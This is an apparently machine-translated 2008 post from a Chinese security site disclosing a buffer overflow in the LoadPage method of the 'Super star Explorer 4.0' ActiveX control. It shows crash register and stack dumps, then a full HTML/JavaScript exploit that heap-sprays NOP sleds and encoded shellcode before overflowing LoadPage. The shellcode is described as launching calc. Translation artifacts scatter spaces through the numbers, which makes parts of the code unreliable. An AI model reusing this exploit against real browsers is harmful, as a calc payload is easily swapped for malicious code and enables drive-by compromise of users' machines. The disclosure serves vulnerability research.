Super star Explorer 4. 0 vulnerability 0day & Exp-vulnerability warning-the black bar safety net

2008-09-22T00:00:00
ID MYHACK58:62200820481
Type myhack58
Reporter 佚名
Modified 2008-09-22T00:00:00

Description

Article author: friddy Information source: evil octal information security teamwww.eviloctal.com to

Note: the article firstFriddy jar, followed by the original author of friendship submitted to the evil octal information security team to discuss the group, reproduced, please famous launch site.

This article only contains a vulnerability the existence of proof, the effect is to run the calculator program, does not contain offensive code!

Last year 1 1 month a vulnerability in the target. Register(ok,buffer), this buffer overflow in the target. LoadPage(buffer ,1 ,1 ,1)

Vulnerability location: clsid:7F5E27CE-4A5C-11D3-9 2 3 2-0000B48A05B2 the LoadPage function buffer overflow occurs Vulnerability warning: ACCESS_VIOLATION Disasm: 4 1 4 1 4 1 4 1????? ()

Register state:

EIP 4 1 4 1 4 1 4 1 EAX BAADF000 EBX 0 0 0 0 0 0 0 0 ECX 0 0 0 0 0 0 0 0 EDX 00B36F48 -> 016E9D0C EDI 0013E084 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ESI 0013E39C -> 0 0 0 0 0 0 0 0 EBP 00B36F48 -> 016E9D0C ESP 0013D85C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ArgDump:

EBP+8 BAADF00D EBP+1 2 0 0 0 0 0 0 0 0 EBP+1 6 BAADF00D EBP+2 0 BAADF00D EBP+2 4 BAADF00D EBP+2 8 BAADF00D

Stack Dump:

13D85C 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 [................] 13D86C 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 [................] 13D87C 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 [................] 13D88C 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 [................] 13D89C 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 4 1 [................]

The exploit procedure:

<object classid="clsid:7F5E27CE-4A5C-11D3-9 2 3 2-0000B48A05B2" id='target'></object> <P>Made By Friddy QQ:5 6 8 6 2 3 <P>http://www.friddy.cn <SCRIPT language="javascript"> var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889% uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var bigblock = unescape("%u9090%u9090"); var headersize = 2 0; var slackspace = headersize+shellcode. length;//total length while (bigblock. length<slackspace) bigblock+=bigblock; fillblock = bigblock. substring(0, slackspace); block = bigblock. substring(0, bigblock. length-slackspace); while(block. length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<3 0 0; x++) memory[x] = block + shellcode; var buffer = "; while (buffer. length < 3 0 9 2) buffer+="\x0a\x0a\x0a\x0a"; target. LoadPage(buffer,1 ,1 ,1);//this time the problem is LoadPage. Not Register. </script>

ssrexp.rar